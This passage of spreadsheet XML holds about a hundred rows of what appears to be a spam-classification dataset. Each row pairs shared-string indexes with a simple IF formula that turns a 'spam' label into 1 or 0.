    <row r="5299" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5299" t="s">
        <v>10218</v>
      </c>
      <c r="B5299" t="s">
        <v>5294</v>
      </c>
      <c r="C5299" s="1">
        <f>IF(B5299="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5300" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5300" t="s">
        <v>10219</v>
      </c>
      <c r="B5300" t="s">
        <v>5294</v>
      </c>
      <c r="C5300" s="1">
        <f>IF(B5300="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5301" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5301" t="s">
        <v>10220</v>
      </c>
      <c r="B5301" t="s">
        <v>5294</v>
      </c>
      <c r="C5301" s="1">
        <f>IF(B5301="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5302" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5302" t="s">
        <v>10221</v>
      </c>
      <c r="B5302" t="s">
        <v>5294</v>
      </c>
      <c r="C5302" s="1">
        <f>IF(B5302="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5303" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5303" t="s">
        <v>9567</v>
      </c>
      <c r="B5303" t="s">
        <v>5294</v>
      </c>
      <c r="C5303" s="1">
        <f>IF(B5303="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5304" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5304" t="s">
        <v>10222</v>
      </c>
      <c r="B5304" t="s">
        <v>5294</v>
      </c>
      <c r="C5304" s="1">
        <f>IF(B5304="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5305" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5305" t="s">
        <v>10223</v>
      </c>
      <c r="B5305" t="s">
        <v>5294</v>
      </c>
      <c r="C5305" s="1">
        <f>IF(B5305="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5306" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5306" t="s">
        <v>10224</v>
      </c>
      <c r="B5306" t="s">
        <v>5294</v>
      </c>
      <c r="C5306" s="1">
        <f>IF(B5306="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5307" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5307" t="s">
        <v>10225</v>
      </c>
      <c r="B5307" t="s">
        <v>5294</v>
      </c>
      <c r="C5307" s="1">
        <f>IF(B5307="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5308" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5308" t="s">
        <v>10226</v>
      </c>
      <c r="B5308" t="s">
        <v>5294</v>
      </c>
      <c r="C5308" s="1">
        <f>IF(B5308="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5309" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5309" t="s">
        <v>10227</v>
      </c>
      <c r="B5309" t="s">
        <v>5294</v>
      </c>
      <c r="C5309" s="1">
        <f>IF(B5309="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5310" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5310" t="s">
        <v>10228</v>
      </c>
      <c r="B5310" t="s">
        <v>5294</v>
      </c>
      <c r="C5310" s="1">
        <f>IF(B5310="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5311" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5311" t="s">
        <v>10229</v>
      </c>
      <c r="B5311" t="s">
        <v>5294</v>
      </c>
      <c r="C5311" s="1">
        <f>IF(B5311="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5312" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5312" t="s">
        <v>10230</v>
      </c>
      <c r="B5312" t="s">
        <v>5294</v>
      </c>
      <c r="C5312" s="1">
        <f>IF(B5312="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5313" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5313" t="s">
        <v>10231</v>
      </c>
      <c r="B5313" t="s">
        <v>5294</v>
      </c>
      <c r="C5313" s="1">
        <f>IF(B5313="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5314" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5314" t="s">
        <v>10232</v>
      </c>
      <c r="B5314" t="s">
        <v>5294</v>
      </c>
      <c r="C5314" s="1">
        <f>IF(B5314="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5315" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5315" t="s">
        <v>10233</v>
      </c>
      <c r="B5315" t="s">
        <v>5294</v>
      </c>
      <c r="C5315" s="1">
        <f>IF(B5315="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5316" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5316" t="s">
        <v>8718</v>
      </c>
      <c r="B5316" t="s">
        <v>5297</v>
      </c>
      <c r="C5316" s="1">
        <f>IF(B5316="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5317" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5317" t="s">
        <v>6104</v>
      </c>
      <c r="B5317" t="s">
        <v>5294</v>
      </c>
      <c r="C5317" s="1">
        <f>IF(B5317="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5318" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5318" t="s">
        <v>10234</v>
      </c>
      <c r="B5318" t="s">
        <v>5294</v>
      </c>
      <c r="C5318" s="1">
        <f>IF(B5318="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5319" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5319" t="s">
        <v>10235</v>
      </c>
      <c r="B5319" t="s">
        <v>5294</v>
      </c>
      <c r="C5319" s="1">
        <f>IF(B5319="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5320" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5320" t="s">
        <v>10236</v>
      </c>
      <c r="B5320" t="s">
        <v>5294</v>
      </c>
      <c r="C5320" s="1">
        <f>IF(B5320="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5321" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5321" t="s">
        <v>10237</v>
      </c>
      <c r="B5321" t="s">
        <v>5294</v>
      </c>
      <c r="C5321" s="1">
        <f>IF(B5321="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5322" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5322" t="s">
        <v>10238</v>
      </c>
      <c r="B5322" t="s">
        <v>5294</v>
      </c>
      <c r="C5322" s="1">
        <f>IF(B5322="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5323" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5323" t="s">
        <v>10239</v>
      </c>
      <c r="B5323" t="s">
        <v>5294</v>
      </c>
      <c r="C5323" s="1">
        <f>IF(B5323="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5324" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5324" t="s">
        <v>10466</v>
      </c>
      <c r="B5324" t="s">
        <v>5294</v>
      </c>
      <c r="C5324" s="1">
        <f>IF(B5324="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5325" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5325" t="s">
        <v>10240</v>
      </c>
      <c r="B5325" t="s">
        <v>5294</v>
      </c>
      <c r="C5325" s="1">
        <f>IF(B5325="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5326" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5326" t="s">
        <v>10241</v>
      </c>
      <c r="B5326" t="s">
        <v>5294</v>
      </c>
      <c r="C5326" s="1">
        <f>IF(B5326="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5327" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5327" t="s">
        <v>10242</v>
      </c>
      <c r="B5327" t="s">
        <v>5294</v>
      </c>
      <c r="C5327" s="1">
        <f>IF(B5327="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5328" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5328" t="s">
        <v>10243</v>
      </c>
      <c r="B5328" t="s">
        <v>5294</v>
      </c>
      <c r="C5328" s="1">
        <f>IF(B5328="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5329" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5329" t="s">
        <v>10244</v>
      </c>
      <c r="B5329" t="s">
        <v>5294</v>
      </c>
      <c r="C5329" s="1">
        <f>IF(B5329="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5330" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5330" t="s">
        <v>10245</v>
      </c>
      <c r="B5330" t="s">
        <v>5294</v>
      </c>
      <c r="C5330" s="1">
        <f>IF(B5330="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5331" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5331" t="s">
        <v>10246</v>
      </c>
      <c r="B5331" t="s">
        <v>5294</v>
      </c>
      <c r="C5331" s="1">
        <f>IF(B5331="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5332" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5332" t="s">
        <v>10247</v>
      </c>
      <c r="B5332" t="s">
        <v>5294</v>
      </c>
      <c r="C5332" s="1">
        <f>IF(B5332="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5333" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5333" t="s">
        <v>10248</v>
      </c>
      <c r="B5333" t="s">
        <v>5294</v>
      </c>
      <c r="C5333" s="1">
        <f>IF(B5333="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5334" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5334" t="s">
        <v>10249</v>
      </c>
      <c r="B5334" t="s">
        <v>5294</v>
      </c>
      <c r="C5334" s="1">
        <f>IF(B5334="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5335" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5335" t="s">
        <v>10250</v>
      </c>
      <c r="B5335" t="s">
        <v>5294</v>
      </c>
      <c r="C5335" s="1">
        <f>IF(B5335="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5336" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5336" t="s">
        <v>10251</v>
      </c>
      <c r="B5336" t="s">
        <v>5294</v>
      </c>
      <c r="C5336" s="1">
        <f>IF(B5336="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5337" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5337" t="s">
        <v>10252</v>
      </c>
      <c r="B5337" t="s">
        <v>5294</v>
      </c>
      <c r="C5337" s="1">
        <f>IF(B5337="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5338" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5338" t="s">
        <v>10253</v>
      </c>
      <c r="B5338" t="s">
        <v>5294</v>
      </c>
      <c r="C5338" s="1">
        <f>IF(B5338="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5339" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5339" t="s">
        <v>10254</v>
      </c>
      <c r="B5339" t="s">
        <v>5294</v>
      </c>
      <c r="C5339" s="1">
        <f>IF(B5339="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5340" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5340" t="s">
        <v>10255</v>
      </c>
      <c r="B5340" t="s">
        <v>5294</v>
      </c>
      <c r="C5340" s="1">
        <f>IF(B5340="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5341" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5341" t="s">
        <v>10256</v>
      </c>
      <c r="B5341" t="s">
        <v>5294</v>
      </c>
      <c r="C5341" s="1">
        <f>IF(B5341="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5342" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5342" t="s">
        <v>10257</v>
      </c>
      <c r="B5342" t="s">
        <v>5294</v>
      </c>
      <c r="C5342" s="1">
        <f>IF(B5342="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5343" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5343" t="s">
        <v>10258</v>
      </c>
      <c r="B5343" t="s">
        <v>5294</v>
      </c>
      <c r="C5343" s="1">
        <f>IF(B5343="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5344" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5344" t="s">
        <v>10259</v>
      </c>
      <c r="B5344" t="s">
        <v>5297</v>
      </c>
      <c r="C5344" s="1">
        <f>IF(B5344="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5345" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5345" t="s">
        <v>10260</v>
      </c>
      <c r="B5345" t="s">
        <v>5294</v>
      </c>
      <c r="C5345" s="1">
        <f>IF(B5345="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5346" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5346" t="s">
        <v>10261</v>
      </c>
      <c r="B5346" t="s">
        <v>5294</v>
      </c>
      <c r="C5346" s="1">
        <f>IF(B5346="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5347" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5347" t="s">
        <v>10262</v>
      </c>
      <c r="B5347" t="s">
        <v>5294</v>
      </c>
      <c r="C5347" s="1">
        <f>IF(B5347="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5348" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5348" t="s">
        <v>8309</v>
      </c>
      <c r="B5348" t="s">
        <v>5294</v>
      </c>
      <c r="C5348" s="1">
        <f>IF(B5348="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5349" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5349" t="s">
        <v>10263</v>
      </c>
      <c r="B5349" t="s">
        <v>5294</v>
      </c>
      <c r="C5349" s="1">
        <f>IF(B5349="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5350" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5350" t="s">
        <v>10264</v>
      </c>
      <c r="B5350" t="s">
        <v>5294</v>
      </c>
      <c r="C5350" s="1">
        <f>IF(B5350="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5351" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5351" t="s">
        <v>10265</v>
      </c>
      <c r="B5351" t="s">
        <v>5294</v>
      </c>
      <c r="C5351" s="1">
        <f>IF(B5351="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5352" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5352" t="s">
        <v>10266</v>
      </c>
      <c r="B5352" t="s">
        <v>5294</v>
      </c>
      <c r="C5352" s="1">
        <f>IF(B5352="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5353" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5353" t="s">
        <v>10267</v>
      </c>
      <c r="B5353" t="s">
        <v>5294</v>
      </c>
      <c r="C5353" s="1">
        <f>IF(B5353="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5354" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5354" t="s">
        <v>10268</v>
      </c>
      <c r="B5354" t="s">
        <v>5294</v>
      </c>
      <c r="C5354" s="1">
        <f>IF(B5354="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5355" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5355" t="s">
        <v>10269</v>
      </c>
      <c r="B5355" t="s">
        <v>5294</v>
      </c>
      <c r="C5355" s="1">
        <f>IF(B5355="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5356" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5356" t="s">
        <v>10270</v>
      </c>
      <c r="B5356" t="s">
        <v>5294</v>
      </c>
      <c r="C5356" s="1">
        <f>IF(B5356="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5357" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5357" t="s">
        <v>10271</v>
      </c>
      <c r="B5357" t="s">
        <v>5294</v>
      </c>
      <c r="C5357" s="1">
        <f>IF(B5357="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5358" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5358" t="s">
        <v>10272</v>
      </c>
      <c r="B5358" t="s">
        <v>5294</v>
      </c>
      <c r="C5358" s="1">
        <f>IF(B5358="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5359" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5359" t="s">
        <v>7154</v>
      </c>
      <c r="B5359" t="s">
        <v>5294</v>
      </c>
      <c r="C5359" s="1">
        <f>IF(B5359="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5360" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5360" t="s">
        <v>10273</v>
      </c>
      <c r="B5360" t="s">
        <v>5294</v>
      </c>
      <c r="C5360" s="1">
        <f>IF(B5360="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5361" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5361" t="s">
        <v>10274</v>
      </c>
      <c r="B5361" t="s">
        <v>5294</v>
      </c>
      <c r="C5361" s="1">
        <f>IF(B5361="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5362" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5362" t="s">
        <v>10275</v>
      </c>
      <c r="B5362" t="s">
        <v>5294</v>
      </c>
      <c r="C5362" s="1">
        <f>IF(B5362="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5363" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5363" t="s">
        <v>10276</v>
      </c>
      <c r="B5363" t="s">
        <v>5294</v>
      </c>
      <c r="C5363" s="1">
        <f>IF(B5363="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5364" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5364" t="s">
        <v>10277</v>
      </c>
      <c r="B5364" t="s">
        <v>5294</v>
      </c>
      <c r="C5364" s="1">
        <f>IF(B5364="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5365" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5365" t="s">
        <v>10278</v>
      </c>
      <c r="B5365" t="s">
        <v>5294</v>
      </c>
      <c r="C5365" s="1">
        <f>IF(B5365="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5366" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5366" t="s">
        <v>10279</v>
      </c>
      <c r="B5366" t="s">
        <v>5297</v>
      </c>
      <c r="C5366" s="1">
        <f>IF(B5366="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5367" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5367" t="s">
        <v>8538</v>
      </c>
      <c r="B5367" t="s">
        <v>5297</v>
      </c>
      <c r="C5367" s="1">
        <f>IF(B5367="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5368" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5368" t="s">
        <v>10280</v>
      </c>
      <c r="B5368" t="s">
        <v>5297</v>
      </c>
      <c r="C5368" s="1">
        <f>IF(B5368="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5369" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5369" t="s">
        <v>10281</v>
      </c>
      <c r="B5369" t="s">
        <v>5294</v>
      </c>
      <c r="C5369" s="1">
        <f>IF(B5369="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5370" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5370" t="s">
        <v>10282</v>
      </c>
      <c r="B5370" t="s">
        <v>5297</v>
      </c>
      <c r="C5370" s="1">
        <f>IF(B5370="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5371" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5371" t="s">
        <v>10283</v>
      </c>
      <c r="B5371" t="s">
        <v>5294</v>
      </c>
      <c r="C5371" s="1">
        <f>IF(B5371="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5372" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5372" t="s">
        <v>10284</v>
      </c>
      <c r="B5372" t="s">
        <v>5297</v>
      </c>
      <c r="C5372" s="1">
        <f>IF(B5372="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5373" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5373" t="s">
        <v>10285</v>
      </c>
      <c r="B5373" t="s">
        <v>5294</v>
      </c>
      <c r="C5373" s="1">
        <f>IF(B5373="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5374" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5374" t="s">
        <v>10286</v>
      </c>
      <c r="B5374" t="s">
        <v>5294</v>
      </c>
      <c r="C5374" s="1">
        <f>IF(B5374="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5375" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5375" t="s">
        <v>10287</v>
      </c>
      <c r="B5375" t="s">
        <v>5294</v>
      </c>
      <c r="C5375" s="1">
        <f>IF(B5375="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5376" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5376" t="s">
        <v>6788</v>
      </c>
      <c r="B5376" t="s">
        <v>5294</v>
      </c>
      <c r="C5376" s="1">
        <f>IF(B5376="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5377" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5377" t="s">
        <v>5590</v>
      </c>
      <c r="B5377" t="s">
        <v>5294</v>
      </c>
      <c r="C5377" s="1">
        <f>IF(B5377="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5378" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5378" t="s">
        <v>10288</v>
      </c>
      <c r="B5378" t="s">
        <v>5294</v>
      </c>
      <c r="C5378" s="1">
        <f>IF(B5378="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5379" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5379" t="s">
        <v>10289</v>
      </c>
      <c r="B5379" t="s">
        <v>5297</v>
      </c>
      <c r="C5379" s="1">
        <f>IF(B5379="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5380" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5380" t="s">
        <v>10290</v>
      </c>
      <c r="B5380" t="s">
        <v>5297</v>
      </c>
      <c r="C5380" s="1">
        <f>IF(B5380="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5381" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5381" t="s">
        <v>10291</v>
      </c>
      <c r="B5381" t="s">
        <v>5294</v>
      </c>
      <c r="C5381" s="1">
        <f>IF(B5381="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5382" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5382" t="s">
        <v>10292</v>
      </c>
      <c r="B5382" t="s">
        <v>5294</v>
      </c>
      <c r="C5382" s="1">
        <f>IF(B5382="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5383" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5383" t="s">
        <v>10293</v>
      </c>
      <c r="B5383" t="s">
        <v>5297</v>
      </c>
      <c r="C5383" s="1">
        <f>IF(B5383="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5384" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5384" t="s">
        <v>10294</v>
      </c>
      <c r="B5384" t="s">
        <v>5294</v>
      </c>
      <c r="C5384" s="1">
        <f>IF(B5384="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5385" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5385" t="s">
        <v>10295</v>
      </c>
      <c r="B5385" t="s">
        <v>5294</v>
      </c>
      <c r="C5385" s="1">
        <f>IF(B5385="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5386" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5386" t="s">
        <v>10296</v>
      </c>
      <c r="B5386" t="s">
        <v>5294</v>
      </c>
      <c r="C5386" s="1">
        <f>IF(B5386="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5387" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5387" t="s">
        <v>10297</v>
      </c>
      <c r="B5387" t="s">
        <v>5294</v>
      </c>
      <c r="C5387" s="1">
        <f>IF(B5387="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5388" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5388" t="s">
        <v>6326</v>
      </c>
      <c r="B5388" t="s">
        <v>5294</v>
      </c>
      <c r="C5388" s="1">
        <f>IF(B5388="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5389" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5389" t="s">
        <v>10298</v>
      </c>
      <c r="B5389" t="s">
        <v>5294</v>
      </c>
      <c r="C5389" s="1">
        <f>IF(B5389="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5390" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5390" t="s">
        <v>10299</v>
      </c>
      <c r="B5390" t="s">
        <v>5294</v>
      </c>
      <c r="C5390" s="1">
        <f>IF(B5390="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5391" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5391" t="s">
        <v>6393</v>
      </c>
      <c r="B5391" t="s">
        <v>5294</v>
      </c>
      <c r="C5391" s="1">
        <f>IF(B5391="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5392" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5392" t="s">
        <v>10300</v>
      </c>
      <c r="B5392" t="s">
        <v>5294</v>
      </c>
      <c r="C5392" s="1">
        <f>IF(B5392="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5393" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5393" t="s">
        <v>10301</v>
      </c>
      <c r="B5393" t="s">
        <v>5294</v>
      </c>
      <c r="C5393" s="1">
        <f>IF(B5393="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5394" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5394" t="s">
        <v>10302</v>
      </c>
      <c r="B5394" t="s">
        <v>5294</v>
      </c>
      <c r="C5394" s="1">
        <f>IF(B5394="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5395" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5395" t="s">
        <v>10303</v>
      </c>
      <c r="B5395" t="s">
        <v>5294</v>
      </c>
      <c r="C5395" s="1">
        <f>IF(B5395="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5396" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5396" t="s">
        <v>10304</v>
      </c>
      <c r="B5396" t="s">
        <v>5294</v>
      </c>
      <c r="C5396" s="1">
        <f>IF(B5396="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5397" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5397" t="s">
        <v>10305</v>
      </c>
      <c r="B5397" t="s">
        <v>5294</v>
      </c>
      <c r="C5397" s="1">
        <f>IF(B5397="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5398" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5398" t="s">
        <v>10306</v>
      </c>
      <c r="B5398" t="s">
        <v>5294</v>
      </c>
      <c r="C5398" s="1">
        <f>IF(B5398="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5399" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5399" t="s">
        <v>10307</v>
      </c>
      <c r="B5399" t="s">
        <v>5294</v>
      </c>
      <c r="C5399" s="1">
        <f>IF(B5399="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5400" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5400" t="s">
        <v>10308</v>
      </c>
      <c r="B5400" t="s">
        <v>5294</v>
      </c>
      <c r="C5400" s="1">
        <f>IF(B5400="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5401" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5401" t="s">
        <v>10309</v>
      </c>
      <c r="B5401" t="s">
        <v>5294</v>
      </c>
      <c r="C5401" s="1">
        <f>IF(B5401="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5402" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5402" t="s">
        <v>10310</v>
      </c>
      <c r="B5402" t="s">
        <v>5294</v>
      </c>
      <c r="C5402" s="1">
        <f>IF(B5402="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
